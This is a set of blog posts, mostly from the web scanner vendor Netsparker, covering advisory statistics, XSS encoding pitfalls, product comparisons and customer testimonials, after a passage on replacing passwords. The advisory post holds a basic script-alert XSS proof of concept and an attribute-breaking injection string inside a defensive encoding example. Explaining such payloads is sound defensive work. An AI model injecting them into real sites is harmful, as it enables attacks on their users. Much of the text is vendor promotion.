The idea was a novel concept back in 2006, but eight years later it has become a commonplace addition to online banking.  As far back as 2003, RSA implemented two-factor authentication with its SecurID dongle, a token system used largely in government and large corporate environments.  The SecurID system, however, did fall victim to a social engineering attack in 2011.  Even the massively popular online game World of Warcraft has employed two-factor authentication for over four years.  Unfortunately, Blizzard’s Battle.net two-factor authentication system has also run into difficulties with a carefully crafted trojan.  Many other corporations, such as Google and many banking institutions, have utilized two-factor authentication, and they have also been met with problems.

These failures are important to note because they highlight that even better solutions, such as two-factor authentication, are not perfect.  Even so, the banking industry has noticed a significant drop in fraudulent online banking activity with the implementation of two-factor authentication.  Yahoo!, learning from its past compromises, has begun to work heavily with alternative open standard and decentralized authentication protocols like OAuth and OpenID, which has resulted in a measurably stronger security posture for the company and, of course, for other organizations that utilize these API technologies.  More and more types of systems come into existence each year and reduce exclusive reliance on passwords alone.  However, all these technologies require a cognitive challenge-and-response activity from the user, and although biometric systems have existed for decades, only within the past year or two have they truly made their way into commonplace authentication technologies.

Originally, IBM made headlines well over a decade ago with the fingerprint reader built into its ThinkPad laptop series.  However, these were usually not popular outside, again, government and large corporate environments.  More recently and, of course, far more famously, the Apple iPhone 5S and the Samsung Galaxy S5 exploded the field of biometric authentication into everyday life when they implemented fingerprint readers in their cell phone technology.  (Of course, both the iPhone 5S and the Galaxy S5 were almost immediately bested by clever hacks and other methods of circumvention.)  And now the godfather institution of the Internet and many other unarguably badass technologies of the world, the Defense Advanced Research Projects Agency (DARPA), has jumped into the game again with its ‘Active Authentication’ program.  DARPA, in partnership with many research institutions, is turning various biometrics and behaviors into authentication mechanisms, such as hand gestures, predictable behavior patterns, even our language and grammatical choices – all these and more are potential authentication portals years or less down the road.

As for now, though, it seems that two-factor authentication (with cellular phone two-factor currently being the choice du jour) has led the race for the eventual retirement of passwords, but with the help of biometrics and other innovative ideas, passwords are being nudged out even quicker.  Indeed, it will not be long before the archaic notion of username and password in commonplace usage comes to an end not with a bang, but a fizzle, as modern and secure protocols slowly but surely take its place.  It is impossible to say what protocol will become the ultimate victor, but one thing is certain: while it will never truly and entirely go away, password-based authentication will soon be a museum piece much like the Massachusetts Institute of Technology Compatible Time-Sharing System it all started on.

What Can You Learn from 87 Advisories About Web Application Vulnerabilities?


We have been publishing advisories for vulnerabilities that Netsparker Web Application Security Scanner identifies in open source web applications since 2011. Two years ago we published statistics about the identified web application vulnerabilities; this year, to accompany those, we have statistics about the advisories themselves. One thing you will immediately notice is that the number of advisories we publish each year is increasing. In 2014 we published 45 advisories, almost one every week.

How Do We Find These Vulnerabilities?

Every developer has his or her own way of writing code. With such a variety of coding styles, web frameworks and technologies, the challenge for us, or for anyone else for that matter, to develop a web vulnerability scanner that can automatically crawl and scan all types of web applications is a big one. So to ensure that both Netsparker Web Application Security Scanner and Netsparker Cloud can automatically crawl and identify all possible attack surfaces and vulnerabilities in custom web applications, we constantly scan a wide variety of open source web applications throughout the year. Through this process we identify both weaknesses in our own scanning engine, which we address with updates, and vulnerabilities in the web applications themselves.

Why Do We Scan Open Source Projects?

There are several other reasons why we do this exercise, apart from the one mentioned above. We could simply run our tests and not bother contacting the owners of these projects. However, we understand that many open source projects do not have adequate resources to ensure their web application is secure, so to give something back to the community we help these projects ship more secure code, and hopefully improve the security of the internet in general. Secondly, we do it to raise awareness of how easy it is to ship insecure code and how important it is to use the right security tools.

What Can We Learn from Netsparker Advisories?

The advisories we publish are like all other web application advisories, yet there is always a lot to learn from them. To start off, let’s take a look at the graph below, which shows how many advisories we have published each year since 2011.

Graph showing the number of advisories Netsparker released since 2011

In total we have published 87 advisories so far. In 2014 we published 45 advisories, as opposed to the 10 we published in 2011. One must also note that a whopping 53 of these advisories cover multiple vulnerabilities, so technically speaking we are talking about more than just 87 vulnerabilities.

Do these statistics mean that the state of web application security is deteriorating? The answer is both yes and no. The drastic increase in the number of advisories we published is a result of the following:

  • As a company we are growing, and so are our resources. In 2014 we scanned many more web applications than ever before; to be exact, we scanned 97 different web applications.
  • We are constantly improving both the crawling and the scanning technology, hence our scanner is able to identify more attack surfaces and vulnerabilities than before.
  • The number of open source projects is also increasing, hence there is a bigger repertoire to choose from, and for us to scan.

At this stage it is very difficult to predict whether things are improving or not, because tools are also improving and thus finding vulnerabilities which have never been detected before, some of which may have been around for years. Within a few years’ time we should be able to tell better. Also note that this data is based only on the advisories we published. As we saw last year, there are many vulnerabilities which we identify but for which we do not release an advisory, and this year is no different: there are a number of vulnerabilities we identified but, for one reason or another, never published an advisory for.

Type of Vulnerabilities in Advisories

The graph below shows the different types of vulnerabilities that were reported in the advisories since 2011. Cross-site scripting leads the pack: it featured in 78 advisories. Second place goes to SQL Injection with 17 advisories, third is Local File Inclusion with 4 advisories, and so on.

Different types of web application vulnerabilities reported in Netsparker advisories

From our tests you can easily conclude that cross-site scripting vulnerabilities are by far the most common. This is not a surprise, considering that XSS has been on the OWASP Top 10 since the list began. But what does this mean?

The risks of SQL Injection and other high impact vulnerabilities are clearly high - The direct impact of vulnerabilities such as SQL Injection and Remote File Inclusion is quite high. These types of vulnerabilities are widely exploited and are very popular in the media. Therefore there is more awareness of these vulnerabilities, which means that more developers know about these high profile, high risk vulnerabilities and take the necessary precautions.

Exploitation of XSS vulnerabilities is not easy - Exploiting an SQL Injection is a straightforward process compared to exploiting a cross-site scripting vulnerability, which requires preparation, interaction and sometimes even luck. As a matter of fact, very few junior penetration testers or security engineers who are new to web application security have ever properly exploited an XSS issue. Possibly all they have done is the typical alert('XSS') proof of concept, which is enough to prove that the vulnerability exists but understates its actual impact. This causes XSS not to get enough attention, so there is less awareness about it and it is considered a low risk vulnerability, although we know for a fact that big organizations, such as the Apache Foundation, have been hacked via XSS in the past.

Framework support and general defense solutions against XSS are not good enough - To fix SQL Injection vulnerabilities you can just use prepared statements. Yes, there are some extreme edge cases where prepared statements are not enough, but in general you are covered, end of story. On the other hand, if you want to write web applications that are not vulnerable to XSS attacks you are in for a long and very complicated journey, irrespective of the language or framework you are using. None of the frameworks available today have complete and straightforward protection against XSS. In fact, when we analyzed all of the XSS vulnerabilities we found that more than half of the output locations were HTML attribute values, i.e.:

<a href="" title="[VULNERABLE]">

One might be surprised by this initially, because normally the most basic XSS is within the HTML element context, such as:

<p>Something <script>alert('xss')</script></p>

This further proves that there is not enough support from frameworks when it comes to cross-site scripting protection. Encoding in the HTML element context is a well defined and solved problem. But what about encoding in places such as HTML attributes, inline CSS/JS or within CSS/JS blocks? This is more complicated, and depending on the usage the frameworks’ default anti-XSS functions do not support it; for example, if the attribute is wrapped with single quotes (‘), HTML encoding functions will not help you.

Therefore even when developers apply a function that is correct in another context, their web applications are still vulnerable to XSS, because when the input is reflected in an HTML attribute they need a different function. Many frameworks are trying to address this issue and some variants have been addressed, but it will take at least a couple more years before we see solutions as close to the elegance of today's SQL Injection solutions.
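
The attribute-context problem above, as an added illustration written for this article (not code from Netsparker or from any of the advisories): the same untrusted value is rendered into the single-quoted variant of the <a title=...> fragment, once through an encoder that escapes only the four characters that matter in element text and once through a full attribute encoder that turns every non-alphanumeric character into a numeric entity. The sample input, the encoder names and the regex-based attribute listing (a rough stand-in for a browser’s tokenizer) are assumptions of this example.

```python
import re

# Added example, not from the original article or any Netsparker code.
# Constructed sample input: closes a single-quoted attribute and adds another.
UNTRUSTED = "x' bar='1"


def html_text_encode(value: str) -> str:
    """Element-text encoder: escapes only & < > and the double quote.
    Several older HTML-escaping helpers behave like this by default, which
    is why a single-quoted attribute is left wide open."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;"))


def html_attr_encode(value: str) -> str:
    """Attribute encoder: everything except ASCII letters and digits becomes
    &#xHH;, so no quote, space or '=' survives to terminate the attribute,
    whichever quote style the template used (or none at all)."""
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else f"&#x{ord(ch):02X};"
        for ch in value
    )


def render_title(value: str, encoder) -> str:
    """The advisory's <a title=...> fragment, with the single-quoted attribute
    that trips up element-context encoders."""
    return f"<a href='' title='{encoder(value)}'>link</a>"


# Rough stand-in for a browser tokenizer: quoted name=value pairs on the tag.
_ATTR = re.compile(r"""(\w+)=('[^']*'|"[^"]*")""")


def attribute_names(fragment: str) -> list:
    """Attribute names a parser would see on the rendered tag."""
    return [name for name, _ in _ATTR.findall(fragment)]


if __name__ == "__main__":
    for encoder in (html_text_encode, html_attr_encode):
        out = render_title(UNTRUSTED, encoder)
        print(f"{encoder.__name__}: {out} -> {attribute_names(out)}")
    # html_text_encode yields ['href', 'title', 'bar']: the input added an
    # attribute. html_attr_encode yields ['href', 'title'] only.
```

The check worth keeping from this is the last one: after encoding, the tag must carry exactly the attributes the template declared. A helper that escapes the double quote but not the single quote passes that check for title="..." and fails it for title='...', which is precisely the mismatch between “the correct function in another context” and the function the attribute context actually needs.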

How Bad is the Impact of an Exploited XSS Vulnerability?

There is a common misconception in the web application security industry that XSS is not a vulnerability you should worry about, as it is not as dangerous as an SQL Injection, and that therefore these results are not as alarming as they might seem. As explained in Web Application Security Misconception; Are All Vulnerabilities Equally Dangerous?, XSS can be as dangerous as an SQL Injection. It is all about the context and attack avenues, so it should be given the same importance and attention when it comes to remediation.

Type of Web Technologies and Database Servers

Since 2011 we have released advisories for 79 different projects in total. 45 of the vulnerabilities we identified were zero days. To give you an idea of the type of web applications we are scanning, most of them use MySQL as their database server, although we have seen some which use NoDB.

The majority of the scanned open source web applications are written in PHP, though we also scanned and found vulnerabilities in web applications written in .NET, Java, Python, Perl & CGI and Ruby on Rails.

The Shocking Truth of Vulnerabilities and Advisories

All of the above advisories concern vulnerabilities in 79 different open source web application projects. There are other vulnerabilities we know of but have not released an advisory for, and there are thousands of other web applications out there, so this is just a fraction of the whole. Should you be alarmed?

I would say yes, we should be alarmed. Most of these open source web applications have many users and developers, and some of them are relatively popular. If such vulnerabilities are being missed, even with the exposure they get and with so many eyeballs analysing the source code, how can you still be sure that your website is secure? Is your custom web application being tested enough to withstand a malicious attack? When you look at the state of security of these projects you start realizing how badly written many web applications are, and how important it is to use the right tools to ensure that you develop and use secure web applications.

And to close this article on a high, here is an interesting statistic: of the 79 projects we tried to get in touch with, 45 never got back to us. Why is this interesting? Well, let me just say that most of those who never got back to us are relatively popular and active projects in their niche. Some of them even have commercial extensions or are available commercially.

Unify Uses Netsparker to Keep Fortune 500 Companies Safe from Vulnerabilities and Security Flaws


“Netsparker is the best Web Application Security Scanner in terms of price-benefit balance. It is a very stable software, faster than the previous tool we were using and it is relatively free of false positives, which is exactly what we were looking for,” said Harald Nandke, Principal Consultant, Unify.

Unify is one of the world’s leading communications software and services firms, providing integrated solutions to approximately 75 percent of the Fortune Global 500 companies. The solutions they offer unify multiple networks, devices and applications into one easy-to-use platform that allows teams to engage in rich and meaningful conversations. Unify has a strong heritage of product reliability, innovation, open standards and security.

Unify’s Need for Web Application Security

Unify develops web-based products, and also provides security services and penetration tests. For a company that is proud of its 160 years of experience in communications technology, it cannot afford to ship vulnerable web applications or not identify all vulnerabilities on a customer’s web application during a penetration test.

To retain its healthy customer base and ensure growth, Unify leads by example: the tools that its security professionals use to scan the web applications that are shipped with their own products are also used for all customers’ penetration tests. By doing so, Unify also ensures that all customers get the best possible service: one that they trust themselves.

The Challenge to Identify All Vulnerabilities and Security Flaws

Some years ago, Unify security professionals used to perform manual penetration tests. However, as both their products and customers’ web applications grew and became more complex, they needed security tools to keep up with all the new web development frameworks, as well as the growing demand.

By using the right security tools, Unify’s security professionals could automate most of the processes and, at the same time, confirm that all potential attack surfaces of a web application were identified. Therefore, by combining manual testing and automated scans Unify’s security team could not only save on time and costs, but would also ensure that no stone was left unturned, and that all vulnerabilities and security flaws were identified.

Sourcing the Right Web Application Security Scanner

Finding the right web application security scanner is not easy when you need to scan thousands of websites and web applications that are built with so many different web frameworks and run on a variety of web servers.

Considering the urgency of the matter, Unify’s security professionals opted for a popular commercial tool, though it soon let them down because of the high amount of false positives it reported. False positives are a big productivity killer, because rather than relying on the scanner’s results you have to verify its findings, hence losing all the benefits of automation.

Unify’s security experts decided to dig deeper into automation technology. “When we looked around in 2011 for a new web application security scanner, we tested several tools,” said Harald Nandke, Principal Consultant at Unify. “Netsparker was the best in terms of price-benefit balance. It is a very stable software, faster than the previous tool we were using and it is relatively free of false positives, which is exactly what we were looking for,” added Nandke.

Unify and Netsparker’s Strong Partnership

Unify has been using Netsparker Web Application Security Scanner for almost four years. They scan at least thirty web applications per month and this number is expected to grow. Such a strong partnership could not be possible without outstanding product support, especially in this complex and always evolving industry.

“We used Netsparker’s support from time to time and the experience was very good. We are satisfied with the response time and also with the service and solution quality,” said Nandke.

Netsparker has become a valuable tool in Unify’s security toolbox. It enables its security professionals to efficiently scan their own web applications, as well as their customers’, and to highlight the most important security threats before manual testing completes the penetration test.

About Netsparker Web Application Security Scanner

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free Netsparker Web Application Security Scanner and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products, Netsparker Web Application Security Scanner and Netsparker Cloud. Founded in 2009, Netsparker's automated web vulnerability scanners are the leading security tools and are used by world renowned organizations such as Samsung, NASA, Skype, Vodafone, ING Bank and Ernst & Young.

About Unify

Unify is a global communications software and services company. They unify their customers’ communications systems. By synchronizing technologies, creating an engaging user experience and weaving communications seamlessly into the way businesses operate, they empower an increasingly mobile workforce to work better together. The result is a transformation of how the enterprise communicates and collaborates that amplifies collective efforts, energizes the business and drives better performance.


Netsparker Cloud or Netsparker Desktop?


As most of you know, we are working on a new product: Netsparker Cloud. We are already planning the release, so it should be available to the public very soon. In the meantime you can still apply for a Netsparker Cloud trial, so go ahead and give it a shot. As the name implies, Netsparker Cloud is an online web application security scanner. Since we now provide both a desktop scanner and an online scanning solution, people have started asking us which option they should go for, or which one is the best.

Neither product is better than the other as such; it all depends on your requirements. In this article I will take a deeper look into the scope and features of each product to help you come up with your own answer.

Netsparker Crawling and Scanning Technology

Both Netsparker Desktop (a.k.a. Netsparker Web Application Security Scanner) and Netsparker Cloud are built around the same crawling and false positive free scanning technology. Therefore, in terms of web application coverage and detection of vulnerabilities and security flaws, you will always get the same results from both solutions. And as we all know, Netsparker has industry leading scanning technology.

Overview of Both Netsparker Web Application Security Scanners

The main differences between the desktop and online scanners of Netsparker are the features, which of course define their scope. The desktop edition of Netsparker was built for those who mostly do penetration tests on their own and scan a medium number of websites, although we have seen a number of implementations where multiple installations of the Netsparker Desktop edition are used to scan hundreds of websites on a monthly basis.

The desktop edition of Netsparker Web Application Security Scanner

Netsparker Cloud is specifically built for large organizations who would like to scan many websites and web applications and ensure their security in the long run. By many we also mean in the hundreds and thousands of web applications. Netsparker Cloud is a multi user platform that has several features and tools that allow big teams to collaborate. This does not mean smaller organizations cannot use Netsparker Cloud though.

The dashboard of Netsparker Cloud online web application security scanner

Scalability of Service

This is the major difference between the two scanners. The resources of Netsparker Desktop are limited to the specifications of the hardware it is running on. It was designed to scan one or a few web applications at a time. If you would like to scan multiple websites at the same time you can manually launch multiple instances of the desktop scanner. Netsparker Cloud, on the other hand, is a hosted web vulnerability scanner and is therefore not limited in terms of resources. It has a virtually unlimited amount of resources thanks to Amazon's cloud (AWS) infrastructure and can scan thousands of web applications and websites at the same time.

Feature Highlight: Website Groups

In Netsparker Cloud you can group websites. This allows you to configure generic scan settings for all the websites in a group, launch a web security scan against all the websites with just a single click and also schedule automated security scans of all websites in that group.

Grouping websites in Netsparker Cloud

Keeping Up with the Latest Web Security Threats

Follow our web application security blog and you will notice that we frequently release software updates. In fact, the list of vulnerability checks in the Netsparker scanning engine is ever growing. It is our duty to release frequent updates and ensure that all Netsparker users can scan their web applications against the latest security threats and vulnerabilities. The response time for releasing new security checks is also critical, especially when a critical vulnerability such as Shellshock is discovered and being exploited in the wild.

In the case of Netsparker Desktop, each time you launch the scanner it will check for updates and advise you should any be available. It is a very practical solution; it only takes a minute or two to get the latest updates. With Netsparker Cloud things are even easier, as it is a maintenance free service. As soon as we discover something new, we update the service ourselves from a central location and the updates are automatically available to you.

Web Security Scanners Adaptability

Typically desktop software is far more configurable than an online service. The reason is that an online service is built around an engine designed to cater for a wider variety of customers, hence it has fewer configurable parameters, resulting in a number of limitations. This is not the case with the Netsparker scanners. Anything that can be configured in Netsparker Desktop can be configured in Netsparker Cloud, such as the URL rewrite rules and other crawling options, HTTP connection properties and all the other scan policy settings.

Configuring Scan Policy in Netsparker Cloud

Team Collaboration

Netsparker Desktop is designed for a single user; it is a desktop application that can only be run by the user who has access to the computer where it is installed. Netsparker Cloud is a multi user environment, therefore all your team members can have their own user under the same Netsparker Cloud account and launch web application security scans, view reports, etc. As an administrator you can configure different privileges for each user, so some of them can be limited to viewing scan results and reports only, while others manage a website group, etc.

Multiple users in a Netsparker Cloud account

Feature Highlight: Vulnerability Management and Tasks

As in a bug tracking system, in Netsparker Cloud you can assign identified vulnerabilities as tasks to a team member so they can remediate the vulnerability. Such a feature is definitely a must have, especially when you need to keep track of the security of many web applications.

Assigning a vulnerability as a task in Netsparker Cloud

Once the issue is marked as fixed by the developer, Netsparker Cloud will automatically rescan the website just for that vulnerability. If the vulnerability is fixed the task is automatically closed; should the website still be vulnerable, Netsparker Cloud will reopen the task and reassign it to the developer.

The vulnerability management system is designed to ensure that every user knows what needs to be done and that the results and fixes are checked automatically by Netsparker Cloud. If you already have a bug tracking solution and want to keep using it, Netsparker Cloud can be integrated with your own bug tracking solution as well.

User's To Do List (Vulnerabilities Assigned as Tasks) in Netsparker Cloud

Web Application Security Scans in Your SDLC

Both the desktop and cloud editions of Netsparker can be easily integrated within your SDLC and Continuous Integration process. Netsparker Desktop has command line support; you can easily write scripts which can be triggered by other applications and launch automated scans. Netsparker Cloud has an extensive and well documented API which you can use to trigger any type of action you can do from the Netsparker Cloud dashboard.

Keeping Web Applications Secure

Launching a single web application security scan and remediating the identified vulnerabilities can be quite difficult. It is even more difficult and demanding to frequently scan all web applications and ensure that all vulnerabilities are remediated, or even worse, that the applied fixes do not open new security flaws. Keeping track of all the changes and fixes in web applications is vital to better understand how to address specific vulnerabilities and security issues.

If you are using Netsparker Desktop you can compare different scan results of the same website. This allows you to pinpoint the differences between the web application security scans and keep track of all the issues. It is very easy to compare different scan results, though it can consume a lot of time and become a confusing process when you have a lot of websites.

And this is where Netsparker Cloud shines. As explained earlier in this article Netsparker Cloud was designed to help you scan and keep track of the security state of many web applications. It has trending and correlated reports which are automatically updated each time a website or web application is scanned. Hence you do not need to manually compare results but can easily get an overview of what is happening on the website in terms of vulnerabilities and fixes from these reports.

Trend Matrix in Netsparker Cloud

Manual Crawling and Security Scanning

From time to time you might need to manually crawl a website or a section of it. To do so you need to proxy the traffic through the scanner so it can capture it, identify attack surfaces and then scan them. Netsparker Desktop can be used for manual crawling, though Netsparker Cloud cannot, since it is a cloud based product. I am sure you understand why such a service cannot be used for manual browsing. Do not fret, though, if you are a Netsparker Cloud user and you need to do manual crawling.

Even though manual crawling is not supported in Netsparker Cloud, you can still achieve the same results. You can configure a browser to proxy the traffic through a local proxy such as Fiddler and capture the traffic. Once you have captured all the traffic you can import the Fiddler capture into Netsparker Cloud and launch the scan. Your experience won't be as interactive as with Netsparker Desktop, but it will do the job when manual request entry is required.
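The capture-and-import workflow above raises a practical question for whoever prepares the capture: what does the scanner actually need from it, and what should not leave the tester's machine? The script below is an added example and not Netsparker's code; it assumes the proxy session was exported as a HAR 1.2 JSON file (Fiddler and browser developer tools can both produce one) and reduces it to the attack surface a scanner needs, namely each in-scope endpoint with the names of the parameters it accepts. Requests to other hosts are dropped so that third-party assets do not creep into the scan scope, and parameter values are discarded because a manual-browsing capture contains live credentials and session tokens. The sample capture is constructed for the example.

```python
"""Inventory the attack surface recorded in a manual-browsing capture.

Added example, not Netsparker's code. Assumes a HAR 1.2 export of the
proxy session; the sample below is constructed and includes a duplicate
endpoint, a form login, a JSON API call and an out-of-scope CDN asset.
"""
import json
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample capture (HAR 1.2 shape, trimmed to the request side).
SAMPLE_HAR = json.dumps({
    "log": {
        "version": "1.2",
        "entries": [
            {"request": {"method": "GET",
                         "url": "https://app.example.test/search?q=books&page=2",
                         "queryString": [{"name": "q", "value": "books"},
                                         {"name": "page", "value": "2"}]}},
            {"request": {"method": "POST",
                         "url": "https://app.example.test/login",
                         "queryString": [],
                         "postData": {"mimeType": "application/x-www-form-urlencoded",
                                      "params": [{"name": "user", "value": "demo"},
                                                 {"name": "pass", "value": "secret"},
                                                 {"name": "csrf", "value": "abc"}]}}},
            {"request": {"method": "GET",
                         "url": "https://app.example.test/search?q=pens",
                         "queryString": [{"name": "q", "value": "pens"}]}},
            {"request": {"method": "PUT",
                         "url": "https://app.example.test/api/profile",
                         "queryString": [],
                         "postData": {"mimeType": "application/json",
                                      "text": "{\"name\": \"Demo\", \"email\": \"demo@example.test\"}"}}},
            {"request": {"method": "GET",
                         "url": "https://cdn.example.test/static/app.js",
                         "queryString": []}},
        ],
    }
})


def inventory_attack_surface(har_text, in_scope_host):
    """Return {(METHOD, path): sorted parameter names} for one host.

    Only requests to in_scope_host are kept; the proxy records every
    third-party asset the browser fetched and those do not belong in the
    scan scope. Parameter values are deliberately not retained.
    """
    har = json.loads(har_text)
    surface = defaultdict(set)
    for entry in har["log"]["entries"]:
        req = entry["request"]
        parts = urlsplit(req["url"])
        if parts.hostname != in_scope_host:
            continue
        key = (req["method"].upper(), parts.path)
        surface[key].update(p["name"] for p in req.get("queryString", []))
        post = req.get("postData", {})
        # Form bodies arrive pre-parsed in "params" ...
        surface[key].update(p["name"] for p in post.get("params", []))
        # ... while JSON bodies only carry their field names in "text".
        if post.get("mimeType", "").startswith("application/json") and post.get("text"):
            body = json.loads(post["text"])
            if isinstance(body, dict):
                surface[key].update(body.keys())
    return {k: sorted(v) for k, v in surface.items()}


if __name__ == "__main__":
    for (method, path), params in sorted(inventory_attack_surface(SAMPLE_HAR, "app.example.test").items()):
        print(f"{method} {path} params={params}")
```

Running it lists three endpoints (`/search` with `page` and `q`, `/login` with `csrf`, `pass` and `user`, and `/api/profile` with `email` and `name`); the CDN script is filtered out. The same host filter is what you would want in front of any capture import, whichever scanner consumes it.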

Cloud or Desktop Web Application Security Scanner?

I am sure that by now you have a better understanding of both Netsparker Desktop and Netsparker Cloud. To summarize: if you are a small team, do not have many websites to take care of and want to be more hands on with your scans, Netsparker Desktop is your best candidate. If, on the other hand, you operate in a big team, have many websites and web applications to secure and need all the right tools to ensure both collaboration between team members and the security of all web applications, Netsparker Cloud ticks all the boxes for you.

Should you wish and have the time for it, I still recommend you to try them both. You can download a demo of Netsparker Desktop and apply for a free trial of Netsparker Cloud.

DirectDefense Use Netsparker for Automatic Web Application Security Scans Because it is Accurate and Fast


"Netsparker continually executes scans in a more optimized way and delivers actionable results every time. The false-positive free scanning means that Netsparker has already attempted to validate the finding for itself before it provides the results, thus eliminating the need for our consultants to spend time chasing down false positives." Jim Broome, President, DirectDefense.

Founded in 2011, DirectDefense offers security services that are unmatched within the industry. Their core strength is their deep experience in performing security assessments for a wide array of networks, platforms, applications and web applications. DirectDefense's seasoned consultants are focused on providing world-class security services to their clients. Regardless of industry (aerospace, financial, insurance, retail, hospitality, healthcare, education, gaming, technology or energy and utilities), the wealth of knowledge and experience DirectDefense has assists their customers in achieving their security testing and strategy goals.

Fast and Accurate Automated Web Application Security Scans

As part of their service offerings, DirectDefense provides web application penetration tests. At a minimum they analyse around 300 web applications a month, hence speed and accuracy are key factors when it comes to web application security. If the tools they use are slow they cannot keep up with the demand, and if the tools report false positives, consultants will waste precious time verifying the scanner findings.

The Right Automated Web Application Security Scanner

DirectDefense has been using automated web application security scanners since the early days. They have used all of them, but since 2011 they have been using Netsparker as their main scanner, and prefer it unless they are required to use another solution based on their customer's requirements.

When asked why they use Netsparker Web Application Security Scanner: "In a simple word, SPEED. Netsparker continually executes scans in a more optimized way and delivers actionable results every time. The false-positive free scanning means that Netsparker has already attempted to validate the findings for itself before it provides the results, thus eliminating the need for our consultants to spend time chasing down false positive findings," said the president of DirectDefense, Jim Broome. "This lets our consultants focus on refining their testing and validation of existing vulnerabilities and provide quicker results to our customers."

Benefits of Netsparker Web Application Security Scanner

Speed, automation and accuracy are some of the reasons why a security firm such as DirectDefense uses an automated web vulnerability scanner, and in Mr Broome's words Netsparker has it all:

Speed: It is easy to configure and is one of the faster scanners with regards to scan completion.

Automation: Netsparker is easy to automate and can successfully complete batch scans of hundreds of websites and web applications.

Accuracy: Netsparker produces accurate results time and time again, and when it's not 100% sure on a finding, it tells you so. This allows a tester or a consultant to focus on which areas to validate and which areas already have proof of a vulnerability.

The Need to Detect All Technical Vulnerabilities on All Types of Frameworks

Accuracy and adaptability are as important as speed and automation when your clientele consists of major banks and financial institutions. Having such a varied clientele, DirectDefense has seen it all. As Mr Broome says, "You name it, we have scanned it!" It could be a .NET, PHP, Spring, Struts or Java web application running on Apache, Nginx or IIS; DirectDefense has seen it and scanned it with Netsparker.

“Netsparker consistently finds and validates SQL injection vulnerabilities faster than any scanner we have ever used. Be it a banking application or a cloud based CRM application, we recommend continual testing, and Netsparker is such a tool to assist with meeting these requirements,” stated DirectDefense’s president.

World Class Support is Another Important Requirement

Using the right security tools when scanning web applications is a must if you do not want to miss a vulnerability. A malicious attacker only needs to exploit a single vulnerability to gain unauthorized access to the web application and the sensitive data it stores. Web application security is a critical business and one should not forge ahead alone. Hence world class support is another vital requirement security experts such as DirectDefense have when choosing their tools.

The Netsparker support department is known for its world class support, and Mr Broome confirms this: "Yes, if you have a complex issue or even one that is simple to resolve, the Netsparker support staff is there. Don't be surprised if you get an email from Ferruh (the CEO) with recommendations and suggestions."

He couldn't have said it better. We strive to deliver world class support, and if need be even our CEO, who is a seasoned penetration tester himself, gets involved in support tickets.

About DirectDefense

Founded in 2011, DirectDefense offers security services that are unmatched within the industry. Our core strength is our deep experience in performing assessments for a wide array of networks, platforms, and applications. Our seasoned consultants are focused on providing world-class security services to our clients.

Regardless of industry – financial, insurance, retail, hospitality, healthcare, education, gaming, technology, or energy and utilities, our wealth of knowledge and experience can assist you in achieving your security testing and strategy goals.

About Netsparker

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive free web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products. Founded in 2009, Netsparker's automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank and Ernst & Young.


Netsparker Web Application Security Scanners to be Exhibited at the RSA Conference 2015 in USA


We will be exhibiting at the RSA Conference 2015, which will be held at the Moscone Center in San Francisco between the 20th and the 24th of April 2015. Come and pay us a visit at booth 4330 in the North Hall.

We will be more than happy to meet you and answer any queries you might have about using any of the Netsparker Web Application Security Scanners to automatically identify vulnerabilities and security flaws in your websites and web applications. During the RSA Conference we will also be showcasing the all new Netsparker Cloud, our new false positive free online web application security scanner.

Visit the RSA Conference website for a copy of the agenda and for more information about the workshops and tracks that will be held. We also have a number of complimentary exhibit hall only passes, so get in touch with us if you would like one.

Don't forget to drop by our stand to say hi and for more information on how Netsparker can help you keep malicious hackers at bay.

Looking forward to meeting you there!


Netsparker's All New Online Web Application Security Scanner Netsparker Cloud is Here


After a good number of months of late nights, an endless supply of coffee, many beta testers and discussions about adding or removing specific features, we are happy to announce that Netsparker Cloud, the new online web application security scanner, is officially released and available to all of you.

Netsparker Cloud Interface

What is Netsparker Cloud?

The name says it all: Netsparker Cloud is an online web application security scanner built on top of AWS (Amazon Web Services), guaranteeing the best possible performance and scalability. You can scan hundreds or thousands of web applications in just a few hours and all the results will be correlated, easy to access and easy to act on.

The service uses the already proven scanning technology of the desktop edition of Netsparker. Therefore we guarantee that it will detect the most vulnerabilities, as shown in Shay Chen's latest independent web vulnerability scanner comparison, and that it reports no false positives.

Netsparker Cloud Features Highlights

Another online web security scanner on the market? No, Netsparker Cloud is different. It brings a lot to the table especially for large organizations who would like to ensure the security of hundreds and even thousands of websites and web applications. Netsparker Cloud can also be used by small businesses, though as explained in this post it has a good number of features that help organizations ease the job of securing their web applications.

Easy to Use and False Positive Free

Even though easy to use products and false positive free web security scanning technology have become synonymous with the Netsparker brand, it is still very important to talk a bit about them and to remind users and business owners how much their organization can benefit from such features.

Easy to Use Web Security Service

Web application security is not exactly a straightforward process, hence by using easy to use products you ensure that you and your team can focus on securing web applications and not figuring out how to use the tools.

Easily Scan Password Protected Websites

While we are on the subject of ease of use, allow me to show you how you can configure form authentication so Netsparker Cloud can scan a password protected area of your website. You have most probably seen how it works with other tools, where you have to record a login macro or contact support to configure it for you. With Netsparker Cloud it is as simple as specifying the login form URL, username and password; the service will figure out everything else by itself.

Configuring Netsparker Cloud to scan a password protected website

If you are using Client Certificate, NTLM, Basic or Digest authentication simply tick the checkbox and specify the credentials. Yes it is that simple.

False Positive Free Web Security Scan Results

Every security professional will tell you that false positives are a big detriment in the web application security industry. If you use a tool that reports a lot of false positives that you have to manually verify, then what is the use of automating the process? Might as well audit the web application manually, which is of course an impossible feat considering the complexity and size of today’s web applications. And we designed Netsparker’s scanning technology, which is used in both Netsparker Cloud and Desktop with this in mind. Hence Netsparker Cloud is a false positive free online web security scanning service.

Multi-User Platform

One of the biggest problems in the security process is bringing everyone up to speed, keeping developers accountable and maintaining a good communication channel between the security and development teams. Since it is a multi-user platform, Netsparker Cloud allows teams in large organizations to collaborate easily to ensure that all web applications are scanned and all identified vulnerabilities are closed down.

Netsparker Cloud is a multi-user platform that allows the whole team to collaborate

